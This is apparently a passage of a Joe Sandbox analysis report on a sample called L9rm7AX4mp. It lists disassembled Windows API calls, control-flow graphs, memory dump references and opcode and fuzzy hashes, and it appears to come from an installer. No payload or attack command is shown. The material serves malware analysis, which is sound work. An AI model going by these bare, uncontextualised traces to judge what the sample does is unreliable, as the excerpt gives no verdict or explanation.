                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                                      • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                                      • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                      • API String ID: 2252812187-1888249752
                                                                                                      • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                                      • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                                      • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                                      • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmStartSession), ref: 004502F5
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmRegisterResources), ref: 0045030A
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmGetList), ref: 0045031F
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmShutdown), ref: 00450334
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmRestart), ref: 00450349
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmEndSession), ref: 0045035E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                      • API String ID: 1968650500-3419246398
                                                                                                      • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                                      • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                                      • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                                      • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1710 423c73-423c7b 1678->1710 1711 423c80-423c82 1678->1711 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1699 424162-42416a 1688->1699 1705 423fcf-423fda call 4181f0 1688->1705 1697 423f23-423f4a SendMessageA 1689->1697 1698 423d17-423d1c 1689->1698 1706 423db9-423dc0 1690->1706 1707 423cde-423cdf 1690->1707 1701 423e06-423e16 call 423b94 1691->1701 1702 423cae-423cb1 1691->1702 1703 4240e6-4240fb call 424860 1692->1703 1704 423d4b-423d4c 1692->1704 1693->1699 1700 4240be-4240c9 GetFocus 1693->1700 1708 423d88-423d90 call 4241ec 1694->1708 1709 423d79-423d9c call 423b94 1694->1709 1695->1699 1697->1699 1713 423d22-423d23 1698->1713 1714 42405a-424065 1698->1714 1715 424181-424187 1699->1715 1700->1699 1722 4240cf-4240d8 call 41f004 1700->1722 1701->1699 1723 423cb7-423cba 1702->1723 1724 423e2e-423e4a PostMessageA call 423b94 1702->1724 1703->1699 1717 423d52-423d55 1704->1717 1718 4240fd-424104 1704->1718 1705->1699 1766 423fe0-423fef call 4181f0 IsWindowEnabled 1705->1766 1706->1699 1727 423dc6-423dcd 1706->1727 1728 423ce5-423ce8 1707->1728 1729 423f4f-423f56 1707->1729 1708->1699 1709->1699 1710->1715 1711->1676 1711->1678 1730 424082-42408d 1713->1730 1731 423d29-423d2c 1713->1731 1714->1699 1733 42406b-42407d 1714->1733 1734 424130-424137 1717->1734 1735 423d5b 1717->1735 1744 424106-424119 call 4244e4 1718->1744 1745 42411b-42412e call 42453c 1718->1745 1722->1699 1780 4240de-4240e4 SetFocus 1722->1780 1741 423cc0-423cc3 1723->1741 1742 423eb5-423ebc 1723->1742 1724->1699 1727->1699 1747 423dd3-423dd9 1727->1747 1748 423cee-423cf1 1728->1748 1749 423e4f-423e6f call 423b94 1728->1749 1729->1699 1737 423f5c-423f61 call 404e54 1729->1737 1730->1699 1755 424093-4240a5 1730->1755 1752 423d32 1731->1752 1753 423f66-423f6e 1731->1753 1733->1699 1750 42414a-424159 1734->1750 1751 424139-424148 1734->1751 1754 42415b-42415c call 423b94 1735->1754 1737->1699 1761 423cc9-423cca 1741->1761 1762 423dde-423dec IsIconic 1741->1762 1763 423ebe-423ed1 call 423b24 1742->1763 1764 423eef-423f00 call 423b94 1742->1764 1744->1699 1745->1699 1747->1699 1767 423cf7 1748->1767 1768 423e1b-423e29 call 424188 1748->1768 1795 423e93-423eb0 call 423a94 PostMessageA 1749->1795 1796 423e71-423e8e call 423b24 PostMessageA 1749->1796 1750->1699 1751->1699 1752->1754 1753->1699 1778 423f74-423f7b 1753->1778 1791 424161 1754->1791 1755->1699 1781 423cd0 1761->1781 1782 423da1-423da9 1761->1782 1771 423dfa-423e01 call 423b94 1762->1771 1772 423dee-423df5 call 423bd0 1762->1772 1808 423ee3-423eea call 423b94 1763->1808 1809 423ed3-423edd call 41ef68 1763->1809 1802 423f02-423f08 call 41eeb4 1764->1802 1803 423f16-423f1e call 423a94 1764->1803 1766->1699 1799 423ff5-424004 call 4181f0 IsWindowVisible 1766->1799 1767->1754 1768->1699 1771->1699 1772->1699 1778->1699 1794 423f81-423f90 call 4181f0 IsWindowEnabled 1778->1794 1780->1699 1781->1754 1782->1699 1797 423daf-423db4 call 422c5c 1782->1797 1791->1699 1794->1699 1823 423f96-423fac call 412320 1794->1823 1795->1699 1796->1699 1797->1699 1799->1699 1825 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1799->1825 1821 423f0d-423f10 1802->1821 1803->1699 1808->1699 1809->1808 1821->1803 1823->1699 1830 423fb2-423fbc 1823->1830 1825->1699 1830->1699
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                                      • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                                                      • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                                      • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2015 46783f-467866 call 41462c 2008->2015 2016 46787a-467888 call 495454 2008->2016 2013 467815-46781f call 41460c 2009->2013 2014 467812 2009->2014 2013->2008 2014->2013 2024 46786b-467875 call 4145ec 2015->2024 2025 467868 2015->2025 2022 46788a-467899 call 49529c 2016->2022 2023 46789b-46789d call 4953c0 2016->2023 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2022->2030 2023->2030 2024->2016 2025->2024 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2043 467920-467927 2037->2043 2038->2043 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2043->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2043->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2184 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2184 2177->2184 2203 467f22-467f3d 2184->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2184->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2286 4682ac-4682bf call 41460c 2285->2286 2287 4682a9 2285->2287 2286->2284 2287->2286 2384->2385 2386 468734-46873b 2385->2386 2387 468712-46872f call 44ffc8 call 450124 2385->2387 2391 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2386->2391 2392 46873d-46875a call 44ffc8 call 450124 2386->2392 2387->2386 2405 4687a7-4687ae 2391->2405 2406 4687bf 2391->2406 2392->2391 2407 4687b0-4687b9 2405->2407 2408 4687bb-4687bd 2405->2408 2409 4687c1-4687d0 2406->2409 2407->2406 2407->2408 2408->2409 2410 4687d2-4687d9 2409->2410 2411 4687ea 2409->2411 2412 4687e6-4687e8 2410->2412 2413 4687db-4687e4 2410->2413 2414 4687ec-468806 2411->2414 2412->2414 2413->2411 2413->2412 2415 4688af-4688b6 2414->2415 2416 46880c-468815 2414->2416 2417 4688bc-4688df call 47bfd8 call 403450 2415->2417 2418 468949-468957 call 414b28 2415->2418 2419 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2419 2420 468870-4688aa call 414b28 * 3 2416->2420 2442 4688f0-468904 call 403494 2417->2442 2443 4688e1-4688ee call 47c178 2417->2443 2427 46895c-468965 2418->2427 2419->2415 2420->2415 2431 468a75-468aa4 call 42b97c call 44e84c 2427->2431 2432 46896b-468983 call 429fe8 2427->2432 2459 468b52-468b56 2431->2459 2460 468aaa-468aae 2431->2460 2449 468985-468989 2432->2449 2450 4689fa-4689fe 2432->2450 2464 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2442->2464 2465 468906-468911 call 403494 2442->2465 2443->2464 2457 46898b-4689c5 call 40b44c call 47bfd8 2449->2457 2455 468a00-468a09 2450->2455 2456 468a4e-468a52 2450->2456 2455->2456 2466 468a0b-468a16 2455->2466 2462 468a66-468a70 call 42a06c 2456->2462 2463 468a54-468a64 call 42a06c 2456->2463 2517 4689c7-4689ce 2457->2517 2518 4689f4-4689f8 2457->2518 2471 468bd5-468bd9 2459->2471 2472 468b58-468b5f 2459->2472 2470 468ab0-468ac2 call 40b44c 2460->2470 2462->2431 2463->2431 2464->2427 2465->2464 2466->2456 2468 468a18-468a1c 2466->2468 2478 468a1e-468a41 call 40b44c call 406acc 2468->2478 2497 468af4-468b2b call 47bfd8 call 44cb1c 2470->2497 2498 468ac4-468af2 call 47bfd8 call 44cbec 2470->2498 2481 468c42-468c4b 2471->2481 2482 468bdb-468bf2 call 40b44c 2471->2482 2472->2471 2483 468b61-468b68 2472->2483 2527 468a43-468a46 2478->2527 2528 468a48-468a4c 2478->2528 2490 468c4d-468c65 call 40b44c call 469d68 2481->2490 2491 468c6a-468c7f call 46724c call 466fc8 2481->2491 2509 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2482->2509 2510 468c32-468c40 call 469d68 2482->2510 2483->2471 2493 468b6a-468b75 2483->2493 2490->2491 2542 468cd1-468cdb call 414a54 2491->2542 2543 468c81-468ca4 call 42a050 call 40b44c 2491->2543 2493->2491 2501 468b7b-468b7f 2493->2501 2535 468b30-468b34 2497->2535 2498->2535 2511 468b81-468b97 call 40b44c 2501->2511 2509->2491 2510->2491 2540 468bca-468bce 2511->2540 2541 468b99-468bc5 call 42a06c call 469d68 call 469c08 2511->2541 2517->2518 2529 4689d0-4689e2 call 406acc 2517->2529 2518->2450 2518->2457 2527->2456 2528->2456 2528->2478 2529->2518 2554 4689e4-4689ee 2529->2554 2545 468b36-468b3d 2535->2545 2546 468b3f-468b41 2535->2546 2540->2511 2547 468bd0 2540->2547 2541->2491 2555 468ce0-468cff call 414a54 2542->2555 2571 468ca6-468cad 2543->2571 2572 468caf-468cbe call 414a54 2543->2572 2545->2546 2553 468b48-468b4c 2545->2553 2546->2553 2547->2491 2553->2459 2553->2470 2554->2518 2559 4689f0 2554->2559 2567 468d01-468d24 call 42a050 call 469ec8 2555->2567 2568 468d29-468d4c call 47bfd8 call 403450 2555->2568 2559->2518 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2576 468cc0-468ccf call 414a54 2571->2576 2572->2555 2576->2555 2586->2587 2588 468d59-468d66 call 47c178 2586->2588 2589 468d87-468d97 call 403494 2587->2589 2590 468d73-468d85 call 403684 2587->2590 2598 468da9-468dc0 call 414b28 2588->2598 2589->2598 2590->2589 2597 468d99-468da4 call 403494 2590->2597 2597->2598 2602 468df6-468e00 call 414a54 2598->2602 2603 468dc2-468dc9 2598->2603 2607 468e05-468e2a call 403400 * 3 2602->2607 2605 468dd6-468de0 call 42b0f4 2603->2605 2606 468dcb-468dd4 2603->2606 2608 468de5-468df4 call 414a54 2605->2608 2606->2605 2606->2608 2608->2607
                                                                                                      APIs
                                                                                                        • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                                                        • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                                                        • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                                        • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                                        • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                                        • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                                        • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                                                        • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                        • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                                        • Part of subcall function 004951EC: 73A0A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                                                        • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                                                        • Part of subcall function 004951EC: 73A0A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                                                        • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02089DC0,0208B944,?,?,0208B974,?,?,0208B9C4,?), ref: 00468769
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                                                        • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                                      • String ID: $(Default)$STOPIMAGE$k H
                                                                                                      • API String ID: 3271511185-4041106330
                                                                                                      • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                                      • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                                                                      • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                                      • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: unins$unins???.*
                                                                                                      • API String ID: 3541575487-1009660736
                                                                                                      • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                                      • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                                                      • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                                      • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 873889042-0
                                                                                                      • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                                      • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                                                                      • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                                      • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(0000049C,0046E422), ref: 0046E396
                                                                                                      • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,0000049C,0046E422), ref: 0046E3B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstanceVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 1462612201-0
                                                                                                      • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                                      • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                                                                      • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                                      • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                      • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                                      • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
